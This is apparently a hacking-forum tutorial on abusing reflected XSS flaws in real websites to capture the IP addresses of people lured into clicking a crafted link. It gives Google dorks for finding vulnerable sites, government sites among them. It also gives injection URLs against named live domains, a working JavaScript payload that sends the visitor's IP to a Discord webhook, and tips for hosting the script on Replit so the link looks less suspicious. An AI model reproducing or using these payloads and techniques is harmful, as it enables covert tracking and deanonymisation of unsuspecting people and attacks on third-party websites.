XSS_IP_Grabber_Method

The document outlines a method for exploiting non-persistent XSS vulnerabilities to capture IP addresses by injecting malicious JavaScript into vulnerable websites. It provides step-by-step instructions on finding such sites, injecting code, and setting up an IP grabber script that sends the collected data to a Discord webhook. Additionally, it includes examples and tips for crafting URLs to execute the attack discreetly.


Using non-persistent XSS vulnerabilities to grab IP addresses

By using a non-persistent XSS vulnerability on a website, you can embed IP-grabbing JavaScript in a URL and share it with the target. The IP address is sent to a Discord webhook.

Step 1: Finding a site


Use the following Google dork to find websites that display an error message when an invalid SQL query is entered:

“Web Design By East Technologies”

inurl:".php?id=" "You have an error in your SQL syntax"

Find sites that display the specific text in the URL that caused the error.

The website “http://www.rxydpq.com/news_show.php?id=66%20target=”, for example, is missing the parameter for “target”, resulting in “target=” being displayed on the page. If you want to skip this step, use the examples in step two.

Step 2: Inject Javascript into page


By modifying the text in the URL that caused the error, we can inject whatever text we want into the error message, including HTML and JavaScript. Examples of this are shown below:

HTML content injection examples:
http://www.rxydpq.com/news_show.php?id=66%20%20target=<marquee><h1>BreachForums is da best!</h1></marquee>

https://www.mmftimberhub.com/work_detail.php?id=<marquee><h1>BreachForums is da best!</h1></marquee>

Javascript injection examples:


http://www.rxydpq.com/news_show.php?id=66%20target=<script>alert(String.fromCharCode(35,70,114,101,101,80,111,109))</script>

https://www.colegiosguatemala.com/blog/visualizar.php?id=71?clave=<script>alert(String.fromCharCode(35, 70, 114, 101, 101, 80, 111, 109));</script>

As you can see in the third and fourth examples, I had to use String.fromCharCode
to encode quotation marks and hashtags.

This was written before it became known that Pompompurin was a child groomer. I’m too lazy to change the examples. Also, most of these sites are no longer up. You’ll have to find your own.

Step 3: Setting up the IP grabber script


Now that you have a site vulnerable to cross-site scripting, you need to make a useful payload. In this case, we want the payload to get the IP addresses of visitors and send that information to a webhook.

Having the entire script in the URL would look slightly suspicious. It’s better to store the script on a Repl (https://replit.com) and use a <script src=...> tag to load it from there. (You can also send a Repl to a person directly to log their IP address. If the person knows what Replit is, however, this might not be the best choice.)

Make a new HTML, CSS, JS Repl. The length of the Repl’s name will affect the length of the crafted URL, so make it as short as possible.

Once you have made the new Repl, go to script.js and copy and paste the code below (make sure to change the webhook!):

    function getIP(json) {
      const request = new XMLHttpRequest();
      request.open("POST", "YOUR_WEBHOOK_HERE");
      request.setRequestHeader('Content-type', 'application/json');

      const params = {
        username: "IP Grabber",
        avatar_url: "",
        content: json.ip
      };

      request.send(JSON.stringify(params));
    }

    const script = document.createElement("script");
    script.src = "https://api.ipify.org?format=jsonp&callback=getIP";
    document.getElementsByTagName("body")[0].appendChild(script);

Your screen should look something like this:


Open the webview of the Repl in a new tab, add “/script.js” to the URL, and use that URL as the src attribute of a <script> tag. The URL should be in quotes (e.g. <script src="https://a.exampleusername.repl.co/script.js"></script>).

The crafted URL is finished. Whoever clicks on it will have your JavaScript run on their computer.

Other things to try


To find vulnerable government sites, use this dork.

inurl:".php?id=" "sql syntax" inurl:"gov"

The inurl:”gov” parameter searches for only government websites. This may add credibility to the final link.

Tutorial written by Qwertz

Discord: time.pilot